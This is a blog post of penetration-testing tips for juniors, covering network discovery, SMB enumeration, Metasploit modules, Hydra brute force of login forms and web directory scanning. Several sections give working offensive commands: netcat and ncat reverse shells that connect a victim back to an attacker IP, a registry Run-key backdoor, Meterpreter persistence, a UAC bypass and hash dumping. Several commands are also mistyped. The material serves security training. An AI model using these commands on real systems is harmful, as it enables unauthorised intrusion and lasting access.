Back to Basics -> Junior pentester tips and methodology

Cyber Coaching
6 min readApr 15, 2020

--

Recently myself and a very experienced government cyber analyst were discussing tradecraft. He made a valid point in stating that “experts and pros focus on the basics and do the basics well” I couldnt agree more, it got me thinking that perhaps I should share some of my top basic tips to master when starting within the penetration testing world as a junior.

Setting Up

cat /etc/resolv.conf

echo “namserver X.X.X.X” > /etc/resolv.conf

service network-manger status|start|stop

rounte -n

route add default gw X.X.X.X eth0

Oneliners for internal host discovery.

  • arp-scan $ipaddress | grep 192.168.X | cut -f1 | grep -v ipv4 | grep -v MAC > hosts.txt
  • >cat *.nmap | grep “open” | grep -v “filtered” | cut -d “/” -f1 | sort -u | xargs
  • fping -a -g [ip range]
ICMP Ping Sweep of internal connections

#The above command simply ->

  • arp-scan $ipaddress | grep 192.168.X | cut -f1 = call arp-scan on the selected ip range then from the results only show me the results from the first 3 octets of the IP address

I particular like this oneline as it gives quick results to what port numbers “services” are open on the network range, this can be really useful in certification exams like TIGER SCHEME QSTM and CREST CRT, as you will get asked what ports number are open on X ip range.

Gather a Hostname

nslookup $Ip | nmap $ip will also give hostname

msf_db

>db_nmap -vv -iL 10hosts.txt 192hosts.txt 172hosts.txt

>db_nmap -vv -sU -iL 10hosts.txt

>db_status

>msfdb .init

Nessus

/sbin/service nessusd start/stop

Localhost:8334

SMB — Server Message Block

SMB has for a long time been in the spot light of nortorious vulnerabilities.To really master internal pentest you need to spend a while reading up on SMB and become comftable explointing this service. Here is an overview:

I think SMB exploitation can get confusing as theres so many different tools therefore lets look at a selection and keep it simple.

>nmap[-][-](dash) script smb -vuln* -p445 192.168.83.0/24

>nmap -A -p 445 $Ip

>For LINUX to list shares “nmblookup -A $Ip”

>For Windows NETUSE \\$IP\[sharename]$ “ /u:”

nmblook up LINUX

>A manual method using built in python script “samrdump.py” to enum policy and users

Built in Python Script gathering user names and password policy

You should be aware of the most common SMB vulns:

MS-17–010 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 which affects Vista /server 08 / Win 7 / 2008 R2 / Win 8.1 / 2012 (R2) / 8.1 / Win 10 / Server 2016

For older Windows machines like Windows 2000 / XP / Windows 2003 MS-08–06 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067

Understand PTH attack and SMB Relay attacks:
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/

msfconsole:

use /smb_login

set smb pass [hash]

set smb user [user]

also

use exploit/windows/smb/psexec

also

windows/smb/ms17_010_psexec

Web Applications:

Virus total is great for finding subdomains. https://www.virustotal.com/gui/home/search

Along with DNS searching another good method is checking the sites certificates for subdomains crt.sh

-gobuster dir -u http://10.10.10.140 -w (wordlist) -t 50

-sublist3r -v -d [domin -b (brute force — /usr/share/sublist3r/subbrute/names.txt)

  • amass
  • apt install snapd ->service snapd start ->snap install amass
  • snap run amass $ip / -d [domain]

Using Hydra for HTTP authentication bypass

Select the Network tab and then attempt to login (This will fail to log in). After the login fails click on the POST Method and then click on “Edit and Resent.”

look for the Hostname/IP, Login Page, Request Body, and the error message.

Command Build
With all the information that we have collected now let’s build the hydra command.
Change the <Login page> this value has to start with “/” backspace.
Change <Request body> with the format from the page. We do need to modify the username and password. Replace the failed username with ^USER^ and the failed password with ^PASS^. This change will allow hydra to substitute the values.
Change the <Error Message> with the failed login error message.
Change the <IP Address> with either an IP address or hostname.
Change the <User> with either username or username list.
Change the <Password> with either a password or password list.

Layout of command: hydra -L <USER> -P <Password> <IP Address> http-post-form “<Login Page>:<Request Body>:<Error Message>”

command for brute for http auth form POST

dirb tips

  • > dirb [domain] -p (indicates using a proxy you can pass your results from dirb to burp (>dirb http://somesite.com -p 127.0.0.1:8080
  • dirb -c uses a cookie to authenticate
  • -z 1000 limit request to one per second incase of WAF
  • -X (extensions) -x “.php/.bak”

Mysql:

mysql -u [username] -p [pass] -h [$Ip]

Netat and Ncat:

nc -lvp 8888 >recived.txt -e [cmd to execute]

nc -lvp 8888 -e /bin/bash (listner)

nc -v [$ip of victim ]8888

id / whoami

whoever connects pass them /bin/bash
by using the -e switch followed by a command the connecting shell automatically executes that cmd

ncat

very simular to netcat (nc). Very useful if you can get ncat.exe on the windows victim machine.

attacker > ncat -l -p 5555 -v

victim>ncat -e cmd.exe [attacker ip] 5555

Creating a peristent backdoor

with ncat we need to add the commnad key to the system registry. Firstly in the attacker machine you will need to set your listnener

attacker:

>ncat -l -p 5544 -v

Victim:

now we add the ncat command structre to the registry

start>run>regedit>computer>HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CURRENT VERSION \ RUN

Right click to add the string value to ncat binary select new >string value, then double click on the new file and enter the command you want to run e.g “C:\Windows\System32\ncat.exe 192.168.X.X :5544 -e”

Adding the ncat string value to the registry HKEY_LOCAL_MACHINE

You can now restart the victim machine, once the victim machine restarts the you will gain shell on the attacker listener.

Other methods of presistance

Meterpreter:

use exploit/windows/local/s4u_persistance

set session 2

set trigger logon

set payload windows/meterpreter/reverse_tcp

set lhost / lport

exploit

to test it set listener

exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport

run

now reboot victim and wait for shell :P

More on Meterpreter

“hashdump” can only be run at SYSTEM from the SAMlevel therefore attempt to priv esc by tpying “getsystem” if it fails it may be due to UAC you can check if UAC is enalbed

>post/windows/gather/win_privs

to bypass UAC

>background

>search uac

>use exploit/windows/local/bypassuac

>set session X

>exploit

After you have elevated privs by bypassing UAC heres some useful commands

  • getpid (identify your current pid)
  • ps -U SYSTEM (choose a pid in the list)
  • migrate [PID]
  • getpid

VNC (port 5800|5900)

you can use Firefox to connect via VNC

use auxilliary/scanner/vnc/vnc_login

Permissions

user | group | other (1 | 2 | 4 read | write | exe )

Ldap

ldapsearch -h [ip]-x -b “DC=[name],DC=local” | grep pwd

Kerberos

I think that its fair to say that if you can master all of the above you will be in fairly good place as a junior pentester rember keep it simple and keep enumeratting. Thanks for reading. CodedHound!

--

--

Cyber Coaching
Cyber Coaching

Written by Cyber Coaching

Passionate about helping fill the global cyber security skills shortage gap, through cyber education and coaching www.cybercoaching.co.uk

Responses (1)